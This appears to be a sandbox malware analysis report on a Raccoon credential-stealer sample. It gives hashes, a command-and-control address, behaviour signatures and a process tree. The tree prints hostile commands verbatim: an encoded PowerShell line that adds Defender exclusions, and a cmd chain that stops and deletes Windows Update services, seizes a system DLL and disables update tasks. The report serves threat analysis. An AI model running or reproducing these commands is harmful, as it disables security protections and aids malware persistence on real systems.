Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
08-09-2022 10:55
Static task
static1
General
-
Target
c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe
-
Size
379KB
-
MD5
06f7b1a3af6a67252c707f260a031c57
-
SHA1
3fee890a57a4fd651f9263472fa73115bbfe03d5
-
SHA256
c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d
-
SHA512
6925ef7f3943890650c3250489eda05e16c62f76212a6329790f9e3d013a08e765e739806f78f19429a2fa045ab82cd6078d6d545e7144a554cd46261ea740fe
-
SSDEEP
6144:KbI21ai1wnZ0KtvusH5n4NGSaSVLKlJmqork5jruMJ3Pqe9Pcr6J:6IXi1wZ0KtvusH5n4NGSaSVutruMJ3Nj
Malware Config
Extracted
raccoon
654b3e7f2d409dcde795b5d2dacf4955
http://46.249.58.152/
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEdescription pid process target process PID 4468 created 568 4468 powershell.EXE winlogon.exe PID 4696 created 4004 4696 svchost.exe DllHost.exe PID 4696 created 3748 4696 svchost.exe DllHost.exe PID 4484 created 568 4484 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 4 IoCs
Processes:
U2g2ZBA3.execonhost.exeupdate.exedialer.exepid process 2952 U2g2ZBA3.exe 2540 conhost.exe 3772 update.exe 5024 dialer.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3068 takeown.exe 3404 icacls.exe 4932 takeown.exe 4044 icacls.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 3 IoCs
Processes:
AppLaunch.exepid process 2892 AppLaunch.exe 2892 AppLaunch.exe 2892 AppLaunch.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3068 takeown.exe 3404 icacls.exe 4932 takeown.exe 4044 icacls.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 9 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEconhost.exepowershell.EXEpowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\7782.tmp conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 5 IoCs
Processes:
c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.execonhost.exepowershell.EXEpowershell.EXEconhost.exedescription pid process target process PID 2556 set thread context of 2892 2556 c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe AppLaunch.exe PID 4376 set thread context of 2540 4376 conhost.exe conhost.exe PID 4468 set thread context of 3556 4468 powershell.EXE dllhost.exe PID 4484 set thread context of 4864 4484 powershell.EXE dllhost.exe PID 2932 set thread context of 5024 2932 conhost.exe dialer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Platform\Defender\update.exe conhost.exe File opened for modification C:\Program Files\Platform\Defender\update.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3744 sc.exe 4420 sc.exe 4560 sc.exe 2912 sc.exe 3680 sc.exe 4572 sc.exe 4540 sc.exe 1772 sc.exe 1032 sc.exe 2804 sc.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5092 3748 WerFault.exe DllHost.exe 2364 4004 WerFault.exe DllHost.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exepowershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1662641809" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1404 reg.exe 188 reg.exe 420 reg.exe 4884 reg.exe 1852 reg.exe 592 reg.exe 1772 reg.exe 1272 reg.exe 396 reg.exe 4704 reg.exe 2828 reg.exe 4404 reg.exe 4540 reg.exe 2892 reg.exe 1892 reg.exe 2072 reg.exe 3092 reg.exe 4540 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.execonhost.exepowershell.EXEdllhost.exepid process 4256 powershell.exe 4256 powershell.exe 4256 powershell.exe 3832 powershell.exe 3832 powershell.exe 3832 powershell.exe 4376 conhost.exe 4468 powershell.EXE 4468 powershell.EXE 4468 powershell.EXE 4468 powershell.EXE 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe 3556 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3104 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 4256 powershell.exe Token: SeIncreaseQuotaPrivilege 4256 powershell.exe Token: SeSecurityPrivilege 4256 powershell.exe Token: SeTakeOwnershipPrivilege 4256 powershell.exe Token: SeLoadDriverPrivilege 4256 powershell.exe Token: SeSystemProfilePrivilege 4256 powershell.exe Token: SeSystemtimePrivilege 4256 powershell.exe Token: SeProfSingleProcessPrivilege 4256 powershell.exe Token: SeIncBasePriorityPrivilege 4256 powershell.exe Token: SeCreatePagefilePrivilege 4256 powershell.exe Token: SeBackupPrivilege 4256 powershell.exe Token: SeRestorePrivilege 4256 powershell.exe Token: SeShutdownPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeSystemEnvironmentPrivilege 4256 powershell.exe Token: SeRemoteShutdownPrivilege 4256 powershell.exe Token: SeUndockPrivilege 4256 powershell.exe Token: SeManageVolumePrivilege 4256 powershell.exe Token: 33 4256 powershell.exe Token: 34 4256 powershell.exe Token: 35 4256 powershell.exe Token: 36 4256 powershell.exe Token: SeShutdownPrivilege 4364 powercfg.exe Token: SeCreatePagefilePrivilege 4364 powercfg.exe Token: SeShutdownPrivilege 4476 powercfg.exe Token: SeCreatePagefilePrivilege 4476 powercfg.exe Token: SeShutdownPrivilege 584 powercfg.exe Token: SeCreatePagefilePrivilege 584 powercfg.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3300 powercfg.exe Token: SeCreatePagefilePrivilege 3300 powercfg.exe Token: SeTakeOwnershipPrivilege 3068 takeown.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe Token: 33 3832 powershell.exe Token: 34 3832 powershell.exe Token: 35 3832 powershell.exe Token: 36 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
dwm.exepid process 980 dwm.exe 980 dwm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exeAppLaunch.exeU2g2ZBA3.execonhost.execmd.execmd.exedescription pid process target process PID 2556 wrote to memory of 2892 2556 c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe AppLaunch.exe PID 2556 wrote to memory of 2892 2556 c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe AppLaunch.exe PID 2556 wrote to memory of 2892 2556 c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe AppLaunch.exe PID 2556 wrote to memory of 2892 2556 c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe AppLaunch.exe PID 2556 wrote to memory of 2892 2556 c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe AppLaunch.exe PID 2892 wrote to memory of 2952 2892 AppLaunch.exe U2g2ZBA3.exe PID 2892 wrote to memory of 2952 2892 AppLaunch.exe U2g2ZBA3.exe PID 2952 wrote to memory of 4376 2952 U2g2ZBA3.exe conhost.exe PID 2952 wrote to memory of 4376 2952 U2g2ZBA3.exe conhost.exe PID 2952 wrote to memory of 4376 2952 U2g2ZBA3.exe conhost.exe PID 4376 wrote to memory of 4256 4376 conhost.exe powershell.exe PID 4376 wrote to memory of 4256 4376 conhost.exe powershell.exe PID 4376 wrote to memory of 5080 4376 conhost.exe cmd.exe PID 4376 wrote to memory of 5080 4376 conhost.exe cmd.exe PID 4376 wrote to memory of 5064 4376 conhost.exe cmd.exe PID 4376 wrote to memory of 5064 4376 conhost.exe cmd.exe PID 5080 wrote to memory of 4420 5080 cmd.exe sc.exe PID 5080 wrote to memory of 4420 5080 cmd.exe sc.exe PID 4376 wrote to memory of 3832 4376 conhost.exe powershell.exe PID 4376 wrote to memory of 3832 4376 conhost.exe powershell.exe PID 5064 wrote to memory of 4364 5064 cmd.exe powercfg.exe PID 5064 wrote to memory of 4364 5064 cmd.exe powercfg.exe PID 5080 wrote to memory of 4560 5080 cmd.exe sc.exe PID 5080 wrote to memory of 4560 5080 cmd.exe sc.exe PID 5080 wrote to memory of 4540 5080 cmd.exe sc.exe PID 5080 wrote to memory of 4540 5080 cmd.exe sc.exe PID 5064 wrote to memory of 4476 5064 cmd.exe powercfg.exe PID 5064 wrote to memory of 4476 5064 cmd.exe powercfg.exe PID 5080 wrote to memory of 1772 5080 cmd.exe sc.exe PID 5080 wrote to memory of 1772 5080 cmd.exe sc.exe PID 5064 wrote to memory of 584 5064 cmd.exe powercfg.exe PID 5064 wrote to memory of 584 5064 cmd.exe powercfg.exe PID 5064 wrote to memory of 3300 5064 cmd.exe powercfg.exe PID 5064 wrote to memory of 3300 5064 cmd.exe powercfg.exe PID 5080 wrote to memory of 1032 5080 cmd.exe sc.exe PID 5080 wrote to memory of 1032 5080 cmd.exe sc.exe PID 5080 wrote to memory of 1272 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1272 5080 cmd.exe reg.exe PID 5080 wrote to memory of 396 5080 cmd.exe reg.exe PID 5080 wrote to memory of 396 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1852 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1852 5080 cmd.exe reg.exe PID 5080 wrote to memory of 592 5080 cmd.exe reg.exe PID 5080 wrote to memory of 592 5080 cmd.exe reg.exe PID 5080 wrote to memory of 4704 5080 cmd.exe reg.exe PID 5080 wrote to memory of 4704 5080 cmd.exe reg.exe PID 5080 wrote to memory of 3068 5080 cmd.exe takeown.exe PID 5080 wrote to memory of 3068 5080 cmd.exe takeown.exe PID 5080 wrote to memory of 3404 5080 cmd.exe icacls.exe PID 5080 wrote to memory of 3404 5080 cmd.exe icacls.exe PID 5080 wrote to memory of 1404 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1404 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1892 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1892 5080 cmd.exe reg.exe PID 5080 wrote to memory of 2828 5080 cmd.exe reg.exe PID 5080 wrote to memory of 2828 5080 cmd.exe reg.exe PID 4376 wrote to memory of 2540 4376 conhost.exe conhost.exe PID 4376 wrote to memory of 2540 4376 conhost.exe conhost.exe PID 4376 wrote to memory of 2540 4376 conhost.exe conhost.exe PID 4376 wrote to memory of 2300 4376 conhost.exe cmd.exe PID 4376 wrote to memory of 2300 4376 conhost.exe cmd.exe PID 4376 wrote to memory of 2212 4376 conhost.exe cmd.exe PID 4376 wrote to memory of 2212 4376 conhost.exe cmd.exe PID 5080 wrote to memory of 2072 5080 cmd.exe reg.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{07738010-f620-4a17-b728-c875746ec0c3}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{cd0277fa-fb41-40dc-9e65-26d645b44772}2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
